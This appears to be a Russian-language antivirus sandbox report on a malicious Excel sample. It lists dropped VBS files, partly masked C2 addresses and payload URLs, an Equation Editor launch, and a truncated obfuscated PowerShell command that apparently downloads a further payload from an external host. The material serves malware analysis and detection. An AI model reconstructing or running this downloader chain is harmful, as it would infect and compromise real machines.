Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\newpicturesgetmetonicewit.vBS"
- %APPDATA%\newpicturesgetmetonicewit.vbs
- <Текущая директория>\dc7d0000
- <PATH_SAMPLE>.xls
- 'st##r.co':443
- '10#.#72.130.147':80
- 'ia#####0.us.archive.org':443
- http://10#.#72.130.147/460/hg/wenotedfssheiscutegirltoloveherpicturewithgreatwayofunderstandtogiveagreatkissingthingstobenicewithher________sheisnicetou.doc
- http://10#.#72.130.147/460/newpicturesgetmetonicewith.tIF
- '34.##9.100.209':443
- 'st##r.co':443
- 'ia#####0.us.archive.org':443
- DNS ASK st##r.co
- DNS ASK ia#####0.us.archive.org
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'KCgnezB9JysndXJsICcrJz0gezF9aCcrJ3R0cHMnKyc6JysnLy9pYTYwMDEwMC51Jysncy5hJysncmNoJysnaScrJ3ZlLm9yJysnZycrJy8yNC8nKydpdGVtcy9kZXRhaC1ub3RlLXYvRGV0JysnYWhOb3RlVicrJy50JysneHR7M... (со скрытым окном)